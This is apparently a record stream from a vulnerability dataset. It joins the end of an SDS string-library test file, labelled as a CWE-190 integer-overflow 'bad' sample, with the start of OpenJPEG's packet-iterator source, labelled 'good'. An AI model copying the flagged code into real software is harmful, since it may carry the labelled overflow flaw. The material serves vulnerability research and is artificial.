x = sdsnew(" x ");
sdstrim(x," ");
test_cond("sdstrim() works when a single char remains",
sdslen(x) == 1 && x[0] == 'x')
sdsfree(x);
x = sdsnew("xxciaoyyy");
sdstrim(x,"xy");
test_cond("sdstrim() correctly trims characters",
sdslen(x) == 4 && memcmp(x,"ciao\0",5) == 0)
y = sdsdup(x);
sdsrange(y,1,1);
test_cond("sdsrange(...,1,1)",
sdslen(y) == 1 && memcmp(y,"i\0",2) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,1,-1);
test_cond("sdsrange(...,1,-1)",
sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,-2,-1);
test_cond("sdsrange(...,-2,-1)",
sdslen(y) == 2 && memcmp(y,"ao\0",3) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,2,1);
test_cond("sdsrange(...,2,1)",
sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,1,100);
test_cond("sdsrange(...,1,100)",
sdslen(y) == 3 && memcmp(y,"iao\0",4) == 0)
sdsfree(y);
y = sdsdup(x);
sdsrange(y,100,100);
test_cond("sdsrange(...,100,100)",
sdslen(y) == 0 && memcmp(y,"\0",1) == 0)
sdsfree(y);
sdsfree(x);
x = sdsnew("foo");
y = sdsnew("foa");
test_cond("sdscmp(foo,foa)", sdscmp(x,y) > 0)
sdsfree(y);
sdsfree(x);
x = sdsnew("bar");
y = sdsnew("bar");
test_cond("sdscmp(bar,bar)", sdscmp(x,y) == 0)
sdsfree(y);
sdsfree(x);
x = sdsnew("aar");
y = sdsnew("bar");
test_cond("sdscmp(bar,bar)", sdscmp(x,y) < 0)
sdsfree(y);
sdsfree(x);
x = sdsnewlen("\a\n\0foo\r",7);
y = sdscatrepr(sdsempty(),x,sdslen(x));
test_cond("sdscatrepr(...data...)",
memcmp(y,"\"\\a\\n\\x00foo\\r\"",15) == 0)
{
unsigned int oldfree;
char *p;
int step = 10, j, i;
sdsfree(x);
sdsfree(y);
x = sdsnew("0");
test_cond("sdsnew() free/len buffers", sdslen(x) == 1 && sdsavail(x) == 0);
/* Run the test a few times in order to hit the first two
* SDS header types. */
for (i = 0; i < 10; i++) {
int oldlen = sdslen(x);
x = sdsMakeRoomFor(x,step);
int type = x[-1]&SDS_TYPE_MASK;
test_cond("sdsMakeRoomFor() len", sdslen(x) == oldlen);
if (type != SDS_TYPE_5) {
test_cond("sdsMakeRoomFor() free", sdsavail(x) >= step);
oldfree = sdsavail(x);
}
p = x+oldlen;
for (j = 0; j < step; j++) {
p[j] = 'A'+j;
}
sdsIncrLen(x,step);
}
test_cond("sdsMakeRoomFor() content",
memcmp("0ABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJABCDEFGHIJ",x,101) == 0);
test_cond("sdsMakeRoomFor() final length",sdslen(x)==101);
sdsfree(x);
}
}
test_report()
return 0;
}
#endif
#ifdef SDS_TEST_MAIN
int main(void) {
return sdsTest();
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_1943_1 |
crossvul-cpp_data_good_540_0 | /*
* The copyright in this software is being made available under the 2-clauses
* BSD License, included below. This software may be subject to other third
* party and contributor rights, including patent rights, and no such rights
* are granted under this license.
*
* Copyright (c) 2002-2014, Universite catholique de Louvain (UCL), Belgium
* Copyright (c) 2002-2014, Professor Benoit Macq
* Copyright (c) 2001-2003, David Janssens
* Copyright (c) 2002-2003, Yannick Verschueren
* Copyright (c) 2003-2007, Francois-Olivier Devaux
* Copyright (c) 2003-2014, Antonin Descampe
* Copyright (c) 2005, Herve Drolon, FreeImage Team
* Copyright (c) 2006-2007, Parvatha Elangovan
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS `AS IS'
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include "opj_includes.h"
/** @defgroup PI PI - Implementation of a packet iterator */
/*@{*/
/** @name Local static functions */
/*@{*/
/**
Get next packet in layer-resolution-component-precinct order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_lrcp(opj_pi_iterator_t * pi);
/**
Get next packet in resolution-layer-component-precinct order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_rlcp(opj_pi_iterator_t * pi);
/**
Get next packet in resolution-precinct-component-layer order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_rpcl(opj_pi_iterator_t * pi);
/**
Get next packet in precinct-component-resolution-layer order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_pcrl(opj_pi_iterator_t * pi);
/**
Get next packet in component-precinct-resolution-layer order.
@param pi packet iterator to modify
@return returns false if pi pointed to the last packet or else returns true
*/
static OPJ_BOOL opj_pi_next_cprl(opj_pi_iterator_t * pi);
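/**
A minimal usage sketch for the opj_pi_next_* variants above, assuming 'pi'
points to an iterator obtained from opj_pi_create_decode():

	while (opj_pi_next_lrcp(pi)) {
		... read or emit the packet identified by pi->compno, pi->resno,
		pi->precno and pi->layno ...
	}
*/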
/**
* Updates the coding parameters if the encoding is used with Progression order changes and final (or cinema parameters are used).
*
* @param p_cp the coding parameters to modify
* @param p_tileno the tile index being concerned.
* @param p_tx0 X0 parameter for the tile
* @param p_tx1 X1 parameter for the tile
* @param p_ty0 Y0 parameter for the tile
* @param p_ty1 Y1 parameter for the tile
* @param p_max_prec the maximum precision for all the bands of the tile
* @param p_max_res the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min the minimum dy of all the components of all the resolutions for the tile.
*/
static void opj_pi_update_encode_poc_and_final ( opj_cp_t *p_cp,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min);
/**
* Updates the coding parameters if the encoding is not used with Progression order changes and final (and cinema parameters are used).
*
* @param p_cp the coding parameters to modify
* @param p_num_comps the number of components
* @param p_tileno the tile index being concerned.
* @param p_tx0 X0 parameter for the tile
* @param p_tx1 X1 parameter for the tile
* @param p_ty0 Y0 parameter for the tile
* @param p_ty1 Y1 parameter for the tile
* @param p_max_prec the maximum precision for all the bands of the tile
* @param p_max_res the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min the minimum dy of all the components of all the resolutions for the tile.
*/
static void opj_pi_update_encode_not_poc ( opj_cp_t *p_cp,
OPJ_UINT32 p_num_comps,
OPJ_UINT32 p_tileno,
OPJ_INT32 p_tx0,
OPJ_INT32 p_tx1,
OPJ_INT32 p_ty0,
OPJ_INT32 p_ty1,
OPJ_UINT32 p_max_prec,
OPJ_UINT32 p_max_res,
OPJ_UINT32 p_dx_min,
OPJ_UINT32 p_dy_min);
/**
* Gets the encoding parameters needed to update the coding parameters and all the pocs.
*
* @param p_image the image being encoded.
* @param p_cp the coding parameters.
* @param tileno the tile index of the tile being encoded.
* @param p_tx0 pointer that will hold the X0 parameter for the tile
* @param p_tx1 pointer that will hold the X1 parameter for the tile
* @param p_ty0 pointer that will hold the Y0 parameter for the tile
* @param p_ty1 pointer that will hold the Y1 parameter for the tile
* @param p_max_prec pointer that will hold the maximum precision for all the bands of the tile
* @param p_max_res pointer that will hold the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min pointer that will hold the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min pointer that will hold the minimum dy of all the components of all the resolutions for the tile.
*/
static void opj_get_encoding_parameters(const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res );
/**
* Gets the encoding parameters needed to update the coding parameters and all the pocs.
* The precinct widths, heights, dx and dy for each component at each resolution will be stored as well.
* The last parameter of the function should be an array of pointers, one per component, each pointer leading
* to an area of 4 * max_res values. The data is stored inside this area with the following pattern:
* dx_compi_res0 , dy_compi_res0 , w_compi_res0, h_compi_res0 , dx_compi_res1 , dy_compi_res1 , w_compi_res1, h_compi_res1 , ...
*
* @param p_image the image being encoded.
* @param p_cp the coding parameters.
* @param tileno the tile index of the tile being encoded.
* @param p_tx0 pointer that will hold the X0 parameter for the tile
* @param p_tx1 pointer that will hold the X1 parameter for the tile
* @param p_ty0 pointer that will hold the Y0 parameter for the tile
* @param p_ty1 pointer that will hold the Y1 parameter for the tile
* @param p_max_prec pointer that will hold the maximum precision for all the bands of the tile
* @param p_max_res pointer that will hold the maximum number of resolutions for all the poc inside the tile.
* @param p_dx_min pointer that will hold the minimum dx of all the components of all the resolutions for the tile.
* @param p_dy_min pointer that will hold the minimum dy of all the components of all the resolutions for the tile.
* @param p_resolutions pointer to an area corresponding to the one described above.
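*
* A minimal allocation sketch for p_resolutions (variable names here are only
* illustrative; OPJ_J2K_MAXRLVLS is used as an upper bound for max_res, exactly
* as opj_pi_create_decode() does below):
*
*   OPJ_UINT32 *l_data = (OPJ_UINT32*) opj_malloc(
*       4 * OPJ_J2K_MAXRLVLS * p_image->numcomps * sizeof(OPJ_UINT32));
*   OPJ_UINT32 **l_resolutions = (OPJ_UINT32**) opj_malloc(
*       p_image->numcomps * sizeof(OPJ_UINT32*));
*   for (compno = 0; compno < p_image->numcomps; ++compno)
*       l_resolutions[compno] = l_data + compno * 4 * OPJ_J2K_MAXRLVLS;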
*/
static void opj_get_all_encoding_parameters(const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res,
OPJ_UINT32 ** p_resolutions );
/**
* Allocates memory for a packet iterator. Data and data sizes are set by this operation.
* No other data is set. The include section of the packet iterator is not allocated.
*
* @param p_image the image used to initialize the packet iterator (in fact only the number of components is relevant).
* @param p_cp the coding parameters.
* @param tileno the index of the tile from which creating the packet iterator.
*/
static opj_pi_iterator_t * opj_pi_create( const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 tileno );
/**
* FIXME DOC
*/
static void opj_pi_update_decode_not_poc (opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res);
/**
* FIXME DOC
*/
static void opj_pi_update_decode_poc ( opj_pi_iterator_t * p_pi,
opj_tcp_t * p_tcp,
OPJ_UINT32 p_max_precision,
OPJ_UINT32 p_max_res);
/**
* FIXME DOC
*/
OPJ_BOOL opj_pi_check_next_level( OPJ_INT32 pos,
opj_cp_t *cp,
OPJ_UINT32 tileno,
OPJ_UINT32 pino,
const OPJ_CHAR *prog);
/*@}*/
/*@}*/
/*
==========================================================
local functions
==========================================================
*/
OPJ_BOOL opj_pi_next_lrcp(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
res = &comp->resolutions[pi->resno];
goto LABEL_SKIP;
} else {
pi->first = 0;
}
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
for (pi->resno = pi->poc.resno0; pi->resno < pi->poc.resno1;
pi->resno++) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
comp = &pi->comps[pi->compno];
if (pi->resno >= comp->numresolutions) {
continue;
}
res = &comp->resolutions[pi->resno];
if (!pi->tp_on){
pi->poc.precno1 = res->pw * res->ph;
}
for (pi->precno = pi->poc.precno0; pi->precno < pi->poc.precno1; pi->precno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_rlcp(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
res = &comp->resolutions[pi->resno];
goto LABEL_SKIP;
} else {
pi->first = 0;
}
for (pi->resno = pi->poc.resno0; pi->resno < pi->poc.resno1; pi->resno++) {
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
comp = &pi->comps[pi->compno];
if (pi->resno >= comp->numresolutions) {
continue;
}
res = &comp->resolutions[pi->resno];
if(!pi->tp_on){
pi->poc.precno1 = res->pw * res->ph;
}
for (pi->precno = pi->poc.precno0; pi->precno < pi->poc.precno1; pi->precno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_rpcl(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
goto LABEL_SKIP;
} else {
OPJ_UINT32 compno, resno;
pi->first = 0;
pi->dx = 0;
pi->dy = 0;
for (compno = 0; compno < pi->numcomps; compno++) {
comp = &pi->comps[compno];
for (resno = 0; resno < comp->numresolutions; resno++) {
OPJ_UINT32 dx, dy;
res = &comp->resolutions[resno];
dx = comp->dx * (1u << (res->pdx + comp->numresolutions - 1 - resno));
dy = comp->dy * (1u << (res->pdy + comp->numresolutions - 1 - resno));
pi->dx = !pi->dx ? dx : opj_uint_min(pi->dx, dx);
pi->dy = !pi->dy ? dy : opj_uint_min(pi->dy, dy);
}
}
}
if (!pi->tp_on){
pi->poc.ty0 = pi->ty0;
pi->poc.tx0 = pi->tx0;
pi->poc.ty1 = pi->ty1;
pi->poc.tx1 = pi->tx1;
}
for (pi->resno = pi->poc.resno0; pi->resno < pi->poc.resno1; pi->resno++) {
for (pi->y = pi->poc.ty0; pi->y < pi->poc.ty1; pi->y += (OPJ_INT32)(pi->dy - (OPJ_UINT32)(pi->y % (OPJ_INT32)pi->dy))) {
for (pi->x = pi->poc.tx0; pi->x < pi->poc.tx1; pi->x += (OPJ_INT32)(pi->dx - (OPJ_UINT32)(pi->x % (OPJ_INT32)pi->dx))) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
OPJ_UINT32 levelno;
OPJ_INT32 trx0, try0;
OPJ_INT32 trx1, try1;
OPJ_UINT32 rpx, rpy;
OPJ_INT32 prci, prcj;
comp = &pi->comps[pi->compno];
if (pi->resno >= comp->numresolutions) {
continue;
}
res = &comp->resolutions[pi->resno];
levelno = comp->numresolutions - 1 - pi->resno;
trx0 = opj_int_ceildiv(pi->tx0, (OPJ_INT32)(comp->dx << levelno));
try0 = opj_int_ceildiv(pi->ty0, (OPJ_INT32)(comp->dy << levelno));
trx1 = opj_int_ceildiv(pi->tx1, (OPJ_INT32)(comp->dx << levelno));
try1 = opj_int_ceildiv(pi->ty1, (OPJ_INT32)(comp->dy << levelno));
rpx = res->pdx + levelno;
rpy = res->pdy + levelno;
if (!((pi->y % (OPJ_INT32)(comp->dy << rpy) == 0) || ((pi->y == pi->ty0) && ((try0 << levelno) % (1 << rpy))))){
continue;
}
if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) || ((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
continue;
}
if ((res->pw==0)||(res->ph==0)) continue;
if ((trx0==trx1)||(try0==try1)) continue;
prci = opj_int_floordivpow2(opj_int_ceildiv(pi->x, (OPJ_INT32)(comp->dx << levelno)), (OPJ_INT32)res->pdx)
- opj_int_floordivpow2(trx0, (OPJ_INT32)res->pdx);
prcj = opj_int_floordivpow2(opj_int_ceildiv(pi->y, (OPJ_INT32)(comp->dy << levelno)), (OPJ_INT32)res->pdy)
- opj_int_floordivpow2(try0, (OPJ_INT32)res->pdy);
pi->precno = (OPJ_UINT32)(prci + prcj * (OPJ_INT32)res->pw);
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_pcrl(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
goto LABEL_SKIP;
} else {
OPJ_UINT32 compno, resno;
pi->first = 0;
pi->dx = 0;
pi->dy = 0;
for (compno = 0; compno < pi->numcomps; compno++) {
comp = &pi->comps[compno];
for (resno = 0; resno < comp->numresolutions; resno++) {
OPJ_UINT32 dx, dy;
res = &comp->resolutions[resno];
dx = comp->dx * (1u << (res->pdx + comp->numresolutions - 1 - resno));
dy = comp->dy * (1u << (res->pdy + comp->numresolutions - 1 - resno));
pi->dx = !pi->dx ? dx : opj_uint_min(pi->dx, dx);
pi->dy = !pi->dy ? dy : opj_uint_min(pi->dy, dy);
}
}
}
if (!pi->tp_on){
pi->poc.ty0 = pi->ty0;
pi->poc.tx0 = pi->tx0;
pi->poc.ty1 = pi->ty1;
pi->poc.tx1 = pi->tx1;
}
for (pi->y = pi->poc.ty0; pi->y < pi->poc.ty1; pi->y += (OPJ_INT32)(pi->dy - (OPJ_UINT32)(pi->y % (OPJ_INT32)pi->dy))) {
for (pi->x = pi->poc.tx0; pi->x < pi->poc.tx1; pi->x += (OPJ_INT32)(pi->dx - (OPJ_UINT32)(pi->x % (OPJ_INT32)pi->dx))) {
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
comp = &pi->comps[pi->compno];
for (pi->resno = pi->poc.resno0; pi->resno < opj_uint_min(pi->poc.resno1, comp->numresolutions); pi->resno++) {
OPJ_UINT32 levelno;
OPJ_INT32 trx0, try0;
OPJ_INT32 trx1, try1;
OPJ_UINT32 rpx, rpy;
OPJ_INT32 prci, prcj;
res = &comp->resolutions[pi->resno];
levelno = comp->numresolutions - 1 - pi->resno;
trx0 = opj_int_ceildiv(pi->tx0, (OPJ_INT32)(comp->dx << levelno));
try0 = opj_int_ceildiv(pi->ty0, (OPJ_INT32)(comp->dy << levelno));
trx1 = opj_int_ceildiv(pi->tx1, (OPJ_INT32)(comp->dx << levelno));
try1 = opj_int_ceildiv(pi->ty1, (OPJ_INT32)(comp->dy << levelno));
rpx = res->pdx + levelno;
rpy = res->pdy + levelno;
if (!((pi->y % (OPJ_INT32)(comp->dy << rpy) == 0) || ((pi->y == pi->ty0) && ((try0 << levelno) % (1 << rpy))))){
continue;
}
if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) || ((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
continue;
}
if ((res->pw==0)||(res->ph==0)) continue;
if ((trx0==trx1)||(try0==try1)) continue;
prci = opj_int_floordivpow2(opj_int_ceildiv(pi->x, (OPJ_INT32)(comp->dx << levelno)), (OPJ_INT32)res->pdx)
- opj_int_floordivpow2(trx0, (OPJ_INT32)res->pdx);
prcj = opj_int_floordivpow2(opj_int_ceildiv(pi->y, (OPJ_INT32)(comp->dy << levelno)), (OPJ_INT32)res->pdy)
- opj_int_floordivpow2(try0, (OPJ_INT32)res->pdy);
pi->precno = (OPJ_UINT32)(prci + prcj * (OPJ_INT32)res->pw);
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
}
return OPJ_FALSE;
}
OPJ_BOOL opj_pi_next_cprl(opj_pi_iterator_t * pi) {
opj_pi_comp_t *comp = NULL;
opj_pi_resolution_t *res = NULL;
OPJ_UINT32 index = 0;
if (!pi->first) {
comp = &pi->comps[pi->compno];
goto LABEL_SKIP;
} else {
pi->first = 0;
}
for (pi->compno = pi->poc.compno0; pi->compno < pi->poc.compno1; pi->compno++) {
OPJ_UINT32 resno;
comp = &pi->comps[pi->compno];
pi->dx = 0;
pi->dy = 0;
for (resno = 0; resno < comp->numresolutions; resno++) {
OPJ_UINT32 dx, dy;
res = &comp->resolutions[resno];
dx = comp->dx * (1u << (res->pdx + comp->numresolutions - 1 - resno));
dy = comp->dy * (1u << (res->pdy + comp->numresolutions - 1 - resno));
pi->dx = !pi->dx ? dx : opj_uint_min(pi->dx, dx);
pi->dy = !pi->dy ? dy : opj_uint_min(pi->dy, dy);
}
if (!pi->tp_on){
pi->poc.ty0 = pi->ty0;
pi->poc.tx0 = pi->tx0;
pi->poc.ty1 = pi->ty1;
pi->poc.tx1 = pi->tx1;
}
for (pi->y = pi->poc.ty0; pi->y < pi->poc.ty1; pi->y += (OPJ_INT32)(pi->dy - (OPJ_UINT32)(pi->y % (OPJ_INT32)pi->dy))) {
for (pi->x = pi->poc.tx0; pi->x < pi->poc.tx1; pi->x += (OPJ_INT32)(pi->dx - (OPJ_UINT32)(pi->x % (OPJ_INT32)pi->dx))) {
for (pi->resno = pi->poc.resno0; pi->resno < opj_uint_min(pi->poc.resno1, comp->numresolutions); pi->resno++) {
OPJ_UINT32 levelno;
OPJ_INT32 trx0, try0;
OPJ_INT32 trx1, try1;
OPJ_UINT32 rpx, rpy;
OPJ_INT32 prci, prcj;
res = &comp->resolutions[pi->resno];
levelno = comp->numresolutions - 1 - pi->resno;
trx0 = opj_int_ceildiv(pi->tx0, (OPJ_INT32)(comp->dx << levelno));
try0 = opj_int_ceildiv(pi->ty0, (OPJ_INT32)(comp->dy << levelno));
trx1 = opj_int_ceildiv(pi->tx1, (OPJ_INT32)(comp->dx << levelno));
try1 = opj_int_ceildiv(pi->ty1, (OPJ_INT32)(comp->dy << levelno));
rpx = res->pdx + levelno;
rpy = res->pdy + levelno;
if (!((pi->y % (OPJ_INT32)(comp->dy << rpy) == 0) || ((pi->y == pi->ty0) && ((try0 << levelno) % (1 << rpy))))){
continue;
}
if (!((pi->x % (OPJ_INT32)(comp->dx << rpx) == 0) || ((pi->x == pi->tx0) && ((trx0 << levelno) % (1 << rpx))))){
continue;
}
if ((res->pw==0)||(res->ph==0)) continue;
if ((trx0==trx1)||(try0==try1)) continue;
prci = opj_int_floordivpow2(opj_int_ceildiv(pi->x, (OPJ_INT32)(comp->dx << levelno)), (OPJ_INT32)res->pdx)
- opj_int_floordivpow2(trx0, (OPJ_INT32)res->pdx);
prcj = opj_int_floordivpow2(opj_int_ceildiv(pi->y, (OPJ_INT32)(comp->dy << levelno)), (OPJ_INT32)res->pdy)
- opj_int_floordivpow2(try0, (OPJ_INT32)res->pdy);
pi->precno = (OPJ_UINT32)(prci + prcj * (OPJ_INT32)res->pw);
for (pi->layno = pi->poc.layno0; pi->layno < pi->poc.layno1; pi->layno++) {
index = pi->layno * pi->step_l + pi->resno * pi->step_r + pi->compno * pi->step_c + pi->precno * pi->step_p;
if (!pi->include[index]) {
pi->include[index] = 1;
return OPJ_TRUE;
}
LABEL_SKIP:;
}
}
}
}
}
return OPJ_FALSE;
}
void opj_get_encoding_parameters( const opj_image_t *p_image,
const opj_cp_t *p_cp,
OPJ_UINT32 p_tileno,
OPJ_INT32 * p_tx0,
OPJ_INT32 * p_tx1,
OPJ_INT32 * p_ty0,
OPJ_INT32 * p_ty1,
OPJ_UINT32 * p_dx_min,
OPJ_UINT32 * p_dy_min,
OPJ_UINT32 * p_max_prec,
OPJ_UINT32 * p_max_res )
{
/* loop */
OPJ_UINT32 compno, resno;
/* pointers */
const opj_tcp_t *l_tcp = 00;
const opj_tccp_t * l_tccp = 00;
const opj_image_comp_t * l_img_comp = 00;
/* position in x and y of tile */
OPJ_UINT32 p, q;
/* preconditions */
assert(p_cp != 00);
assert(p_image != 00);
assert(p_tileno < p_cp->tw * p_cp->th);
/* initializations */
l_tcp = &p_cp->tcps [p_tileno];
l_img_comp = p_image->comps;
l_tccp = l_tcp->tccps;
/* here calculation of tx0, tx1, ty0, ty1, maxprec, dx and dy */
p = p_tileno % p_cp->tw;
q = p_tileno / p_cp->tw;
/* find extent of tile */
*p_tx0 = opj_int_max((OPJ_INT32)(p_cp->tx0 + p * p_cp->tdx), (OPJ_INT32)p_image->x0);
*p_tx1 = opj_int_min((OPJ_INT32)(p_cp->tx0 + (p + 1) * p_cp->tdx), (OPJ_INT32)p_image->x1);
*p_ty0 = opj_int_max((OPJ_INT32)(p_cp->ty0 + q * p_cp->tdy), (OPJ_INT32)p_image->y0);
*p_ty1 = opj_int_min((OPJ_INT32)(p_cp->ty0 + (q + 1) * p_cp->tdy), (OPJ_INT32)p_image->y1);
/* max precision is 0 (can only grow) */
*p_max_prec = 0;
*p_max_res = 0;
/* initialize dx_min and dy_min to the largest possible value so the real minimum can be taken below */
*p_dx_min = 0x7fffffff;
*p_dy_min = 0x7fffffff;
for (compno = 0; compno < p_image->numcomps; ++compno) {
/* arithmetic variables to calculate */
OPJ_UINT32 l_level_no;
OPJ_INT32 l_rx0, l_ry0, l_rx1, l_ry1;
OPJ_INT32 l_px0, l_py0, l_px1, py1;
OPJ_UINT32 l_pdx, l_pdy;
OPJ_UINT32 l_pw, l_ph;
OPJ_UINT32 l_product;
OPJ_INT32 l_tcx0, l_tcy0, l_tcx1, l_tcy1;
l_tcx0 = opj_int_ceildiv(*p_tx0, (OPJ_INT32)l_img_comp->dx);
l_tcy0 = opj_int_ceildiv(*p_ty0, (OPJ_INT32)l_img_comp->dy);
l_tcx1 = opj_int_ceildiv(*p_tx1, (OPJ_INT32)l_img_comp->dx);
l_tcy1 = opj_int_ceildiv(*p_ty1, (OPJ_INT32)l_img_comp->dy);
if (l_tccp->numresolutions > *p_max_res) {
*p_max_res = l_tccp->numresolutions;
}
/* use custom size for precincts */
for (resno = 0; resno < l_tccp->numresolutions; ++resno) {
OPJ_UINT32 l_dx, l_dy;
/* precinct width and height */
l_pdx = l_tccp->prcw[resno];
l_pdy = l_tccp->prch[resno];
l_dx = l_img_comp->dx * (1u << (l_pdx + l_tccp->numresolutions - 1 - resno));
l_dy = l_img_comp->dy * (1u << (l_pdy + l_tccp->numresolutions - 1 - resno));
/* take the minimum size for dx for each comp and resolution */
*p_dx_min = opj_uint_min(*p_dx_min, l_dx);
*p_dy_min = opj_uint_min(*p_dy_min, l_dy);
/* various calculations of extents */
l_level_no = l_tccp->numresolutions - 1 - resno;
l_rx0 = opj_int_ceildivpow2(l_tcx0, (OPJ_INT32)l_level_no);
l_ry0 = opj_int_ceildivpow2(l_tcy0, (OPJ_INT32)l_level_no);
l_rx1 = opj_int_ceildivpow2(l_tcx1, (OPJ_INT32)l_level_no);
l_ry1 = opj_int_ceildivpow2(l_tcy1, (OPJ_INT32)l_level_no);
l_px0 = opj_int_floordivpow2(l_rx0, (OPJ_INT32)l_pdx) << l_pdx;
l_py0 = opj_int_floordivpow2(l_ry0, (OPJ_INT32)l_pdy) << l_pdy;
l_px1 = opj_int_ceildivpow2(l_rx1, (OPJ_INT32)l_pdx) << l_pdx;
py1 = opj_int_ceildivpow2(l_ry1, (OPJ_INT32)l_pdy) << l_pdy;
l_pw = (l_rx0==l_rx1)?0:(OPJ_UINT32)((l_px1 - l_px0) >> l_pdx);
